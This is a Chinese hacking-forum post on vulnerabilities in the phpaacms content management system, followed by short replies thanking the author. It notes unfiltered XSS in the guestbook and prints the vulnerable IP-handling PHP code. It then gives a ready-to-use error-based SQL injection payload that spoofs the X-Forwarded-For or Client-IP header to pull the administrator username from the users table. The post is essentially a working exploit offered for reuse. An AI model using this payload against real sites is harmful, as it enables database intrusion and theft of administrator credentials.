phpaacms注入漏洞
本来应该是注册会员了,怎么又变回新手上路了,我这几个星期内起码已经发了两个主题了,可是还是被提醒要封号. What's the hell going on??
所以不能在脚本检测区发帖了,看某黑客发了个此cms的漏洞,就下个了读下。
1.留言表处,无过滤,xss随意乱插.(这里就不演示了)
2.getip注入,这个老生常谈的问题了,$_SERVER无视gpc
include/functions.php:
/**
* phpaa公共PHP函数库
* @author phpaa
*/
/**
* 获取客户端IP
*
* @return string
*/
function get_client_ip(){
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip); //我可以注你吗?ip. 随意伪造个client_ip和x_forwarded_for都可以。
}
if(isset($_POST['name'])){
if(empty($_POST['name'])){
exit ("<script>alert('称呼为空!'); window.history.go(-1);</script>");
}elseif(empty($_POST['content'])){
exit ("<script>alert('内容不能为空!');window.history.go(-1);</script>");
}else{
$record = array(
'title' =>$_POST ['title'],
'name' =>$_POST ['name'],
//'sex' =>$_POST ['sex'],
//'qq' =>$_POST ['qq'],
//'phone' =>$_POST ['phone'],
//'email' =>$_POST ['email'],
//'address' =>$_POST ['address'],
'content' =>$_POST ['content'],
'ip' =>get_client_ip(),
'created_date' =>date ( "Y-m-d H:i:s" )
);
$id = $db->save('phpaadb_message',$record);
exp:
11.1.1.1','11-11'),('','jj',(select * from phpaacms_message where id=3 and (select 1 from (select count(*),concat((select username from phpaacms_users where userid=1),floor(rand(0)*2))x from information_schema.tables group by x)a)),'1.1.1.1','2033-11-15 05:49:42')#
评论27次
不错 顶。 学xi了。 谢谢
楼主,发在技术交流版块
显错注入。。不错。
感谢分享原创资源!!!!
这个很不错!谢谢楼主
哎呦。这个要顶~~~
手下 了